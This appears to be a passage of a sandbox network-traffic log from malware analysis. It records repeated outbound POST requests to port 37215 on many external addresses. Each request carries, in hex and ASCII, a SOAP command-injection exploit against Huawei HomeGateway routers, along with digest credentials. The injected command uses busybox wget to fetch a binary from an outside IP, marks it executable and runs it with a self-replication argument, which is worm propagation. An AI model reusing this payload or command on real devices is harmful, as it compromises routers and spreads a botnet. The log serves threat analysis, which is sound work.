                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1564192.168.2.1355126197.244.23.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586188078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1565192.168.2.1356920197.1.88.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586203098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1566192.168.2.134014641.234.253.11537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586216927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1567192.168.2.134722841.130.6.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586236954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1568192.168.2.135313642.252.43.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586247921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1569192.168.2.1351198197.134.135.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586283922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1570192.168.2.1335362192.223.220.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586302042 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1571192.168.2.1338504197.67.247.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586313009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1572192.168.2.1356630185.118.39.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586324930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1573192.168.2.135322641.92.64.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586344957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 